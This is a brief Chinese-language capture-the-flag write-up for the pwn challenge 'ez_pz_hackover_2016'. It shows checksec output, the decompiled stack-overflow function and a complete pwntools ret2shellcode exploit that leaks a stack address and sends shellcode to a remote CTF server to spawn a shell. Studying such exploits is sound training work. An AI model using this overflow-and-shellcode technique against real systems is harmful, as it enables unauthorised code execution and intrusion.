checksec发现NX保护未开启,因此可以考虑Ret2Shellcode。

1
2
3
4
5
6
7
8
[*] '/home/bronya/Documents/CTF/pwn17/ez_pz_hackover_2016'
Arch: i386-32-little
RELRO: Full RELRO
Stack: No canary found
NX: NX unknown - GNU_STACK missing
PIE: No PIE (0x8048000)
Stack: Executable
RWX: Has RWX segments

ida查看,发现存在栈溢出漏洞,其中n=0x400,因此可以尝试向dest中写入shellcode。

1
2
3
4
5
6
void *__cdecl vuln(int src, size_t n)
{
char dest[50]; // [esp+6h] [ebp-32h] BYREF

return memcpy(dest, &src, n);
}

构造exp:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
from pwn import *

context(arch='i386', log_level='debug')

# p = process('./ez_pz_hackover_2016')
# gdb.attach(p, 'b *0x0804865D')
p = remote('node4.buuoj.cn', 26972)

elf = ELF('./ez_pz_hackover_2016')
printf_got = elf.got['printf']
printf_plt = elf.plt['printf']

shellcode = asm(shellcraft.sh())#生成shellcode,asm函数是进行汇编

p.recvuntil(b'Yippie, lets crash: 0x')
buf_addr = int(p.recv(8), 16) - 0x1c
print(hex(buf_addr))
shellcode_addr = buf_addr

payload = flat(b'crashme\x00', b'a'*(0x16-8), 0x0, shellcode_addr, shellcode)
p.sendlineafter(b'>', payload)

p.interactive()